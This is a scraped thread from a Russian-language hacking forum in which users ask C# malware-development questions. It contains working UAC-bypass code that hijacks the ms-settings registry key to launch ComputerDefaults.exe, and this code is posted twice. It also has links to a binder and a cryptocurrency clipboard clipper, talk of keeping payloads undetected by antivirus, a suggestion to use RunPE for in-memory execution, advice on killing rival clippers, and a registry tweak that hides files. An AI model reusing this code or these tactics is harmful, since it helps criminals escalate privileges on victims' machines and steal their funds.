• XSS.stack #1 – первый литературный журнал от юзеров форума

Вопросы по С#

Пожалуйста, обратите внимание, что пользователь заблокирован
бля.... забыл сказать что знаки // комментариев и число байт в них, естественно удаляются всеми без исключения компиляторами. 100%. Странно только, что везде одни и те же... но не думай об этом). соответственно: в конечном итоге, при изменении комментариев либо "структуры" иной раз даже "md5 не дрогнет", образно выражаясь)

Бл.... опять забыл. Гугли слово "хэщ файлов. чек хэща на любимом ВиТо". потом гугли Анжи Сорками. И глянь хотя бы на его картинки. Я даже заказал несколько, чтобы отдать дань Маэстро ;-)
ЗЫ: прошу прощения за орфографические ошибки, ибо физическая или иная клавиатура/раскладка может измениться в любой момент. не успеваю за этим следить)))

А вообще - мой тебе совет, выкинь форточки.... эм... в среду виртуалок. VS2019 конечно супергуд - мегагуд. Но, мне почему-то кажется, что у такой хитрожопой комании, как майкрософт, для своего-же софта ака дефендре-хейндер-MpC-тарам-пам-пам и прочих драйверов обязательно есть лазейка увидеть скомпилированный другим их софтом исходный код, который, они же и придумали?)) как думаешь, моя сумасшедшая идея имеет право на жизнь?) Я просто немного читал Энгельса, а дядька говорил: "Экономика должна быть экономной. А конкуренция - конкурентной. Это единственный путь вперед. Глобализация и монополизация - читайте Евангиле:от:хз:ст:Х3:0x111 - там где печать 666" .... че-то такое))) в общем - знаешь что? сделай вот так: echo "1" > /sys/brain . Говорят, некоторые просто в восторге)

А вообще - мой тебе совет, выкинь форточки.... эм... в среду виртуалок. VS2019 конечно супергуд - мегагуд. Но, мне почему-то кажется, что у такой хитрожопой комании, как майкрософт, для своего-же софта ака дефендре-хейндер-MpC-тарам-пам-пам и прочих драйверов обязательно есть лазейка увидеть скомпилированный другим их софтом исходный код, который, они же и придумали?)) как думаешь, моя сумасшедшая идея имеет право на жизнь?)
ля ты поронойк, не гони ?
Я код в приват аплоадю на гитхаб...похуй. Как был фуд некоторых софтов так и есть.

ля ты поронойк, не гони ? Я код в приват аплоадю на гитхаб...похуй. Как был фуд некоторых софтов так и есть.
ля ты поронойк, не гони ? Я код в приват аплоадю на гитхаб...похуй. Как был фуд некоторых софтов так и есть.

Так я и не гоню. Однако видел как кто-то там чистил кому-то детекты. Магия какая-то. Ее опасаюсь я ;-)

Хз о чем ты бро. Эти прекрасные окошки лишь сняться переодически. Любые физические контакты мой мозг воспинимает как что-то ... эм.. магическое, после чего и детекты чистеть уже не такая-уж и плохая идея. Предпочитаю понимать логику работы вспомогательных программ. Если и использую вс - случай очень редкий. Использую, естественно strace для совсем непонятных ситуаций, а для shebang модификатор -x. Наверное дело во мне - люблю ясность и нелюблю &>/dev/null в каждой строчке - мысли нехорошие))) гугли, и да WinDBG тебе в помощь)

Так я и не гоню. Однако видел как кто-то там чистил кому-то детекты. Магия какая-то. Ее опасаюсь я ;-)
Я на ВМ кодю без инета. Но я не HVNC на С++ приватный пишу так что параноить в этом плане перебор. Вообще пишу пока для паблика под хайд. Но да же если начну писать реально приват под себя или продажу не вижу смысла в твоем параноидальном отношении к VS и окнам.

Спорить, с таким профессионалом как ты, считаю бессмысленным. приношу извинения, ежели чем задел. удаляюсь. Позволю лишь на последок: писать - уже лет 20 никто ниче не пищет. сорсят друг у друга, а тут без инета - как башкой об парту, эффект тот же. Кодить в VS =) тут уж, маэстро, ты меня сразил. за сим откланяюсь. всего самого)

Спорить, с таким профессионалом как ты, считаю бессмысленным. приношу извинения, ежели чем задел. удаляюсь. Позволю лишь на последок: писать - уже лет 20 никто ниче не пищет. сорсят друг у друга, а тут без инета - как башкой об парту, эффект тот же. Кодить в VS =) тут уж, маэстро, ты меня сразил. за сим откланяюсь. всего самого)
ты о чем говоришь, я только изучаю C# я половина твоих слов не понимаю. А ты уже меня сравнил с профессионалом) Я задал только 1 вопрос. А ты вступил со мной в дискуссию буд то я уже трукодер))) может я чего и стою ? раз так

+++

Ну а пока мы дружно ждем, некоторые во всю юзают => https://github.com/qwqdanchun/DcBinder <= этот биндер от хорошего китайского парня, и иногда этот => https://repo.x4k.dev/windows/clipper.zip <= клиппер от другого (не помню уже точно) парня. мною модифицированный (вроде)

Может кто видел бесплатно или поделитесь UACBypass получше этого:

C#:
 public static void Run()
        {
            if (Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\shell\open\command") == null)
                ElevateMe();
            else
                Registry.CurrentUser.DeleteSubKey(@"Software\Classes\ms-settings\shell\open\command");
            if (!IsElevated())
                Environment.Exit(0);
        }
        private static bool IsElevated()
        {
            using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
            {
                WindowsPrincipal principal = new WindowsPrincipal(identity);
                return principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
        }
        private static void ElevateMe()
        {
            try
            {
                CreateKey(string.Empty, Assembly.GetEntryAssembly().Location);
                CreateKey("DelegateExecute", string.Empty);
                Process.Start(@"C:\Windows\System32\ComputerDefaults.exe");
                Environment.Exit(0);
            }
            catch { }
            void CreateKey(string name, string val)
            {
                RegistryKey key = Registry.CurrentUser.CreateSubKey(@"Software\Classes\ms-settings\shell\open\command");
                key.SetValue(name, val);
                key.Close();
            }
        }

Это паблик с гитхаба чуток переделанный.
Не везде срабатывает.
на тебе и не еби мозги себе и другим https://github.com/hfiref0x/UACME

Рад за вас парни, вижу что помирились все-таки =) Че могу сказать - Ingiborga - будущий великий программист или как их там. хацкер во =) 100%

Может кто видел бесплатно или поделитесь UACBypass получше этого:

C#:
 public static void Run()
        {
            if (Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\shell\open\command") == null)
                ElevateMe();
            else
                Registry.CurrentUser.DeleteSubKey(@"Software\Classes\ms-settings\shell\open\command");
            if (!IsElevated())
                Environment.Exit(0);
        }
        private static bool IsElevated()
        {
            using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
            {
                WindowsPrincipal principal = new WindowsPrincipal(identity);
                return principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
        }
        private static void ElevateMe()
        {
            try
            {
                CreateKey(string.Empty, Assembly.GetEntryAssembly().Location);
                CreateKey("DelegateExecute", string.Empty);
                Process.Start(@"C:\Windows\System32\ComputerDefaults.exe");
                Environment.Exit(0);
            }
            catch { }
            void CreateKey(string name, string val)
            {
                RegistryKey key = Registry.CurrentUser.CreateSubKey(@"Software\Classes\ms-settings\shell\open\command");
                key.SetValue(name, val);
                key.Close();
            }
        }

Это паблик с гитхаба чуток переделанный.
Не везде срабатывает.
я так полагаю под словом чуток переделанный ты наверно имел ввиду эту строчку " Process.Start(@"C:\Windows\System32\ComputerDefaults.exe");" а именно поменял название файла "ComputerDefaults" друг не занимайся пиздабольством пожалуйста в c# ты вообще ничерта не умеешь максимум название другое вписать не более

Всем доброго времени, можно ли в с# запустить файл в памяти? Если да , то где почитать?
RunPE

Какие способы можно придумать для защиты от конкуренции чужого клиппера?
Не лить с биржи

Какие способы можно придумать для защиты от конкуренции чужого клиппера?
В общем случае адекватное решение этого вопроса вряд ли существует. Если нужно противодействовать кому то конкретному, то можно там процесс прибивать, или окно, которое получает нотификацию об изменении в буффере обмена, закрывать и всякие такие вещи.

В общем случае адекватное решение этого вопроса вряд ли существует. Если нужно противодействовать кому то конкретному, то можно там процесс прибивать, или окно, которое получает нотификацию об изменении в буффере обмена, закрывать и всякие такие вещи.
Вот и я к этому пришел, лучше не чего не придумал.

C#:
 string subKey = @"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced";
                            string h = "Hidden";
                            int r = 0;
                            RegistryKey k = Registry.CurrentUser;
                            k = k.CreateSubKey(subKey);
                            k.SetValue(h, r);
Работает только после обновления explorer или ребута пк. Как сделать обновлние сразу после этого?

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх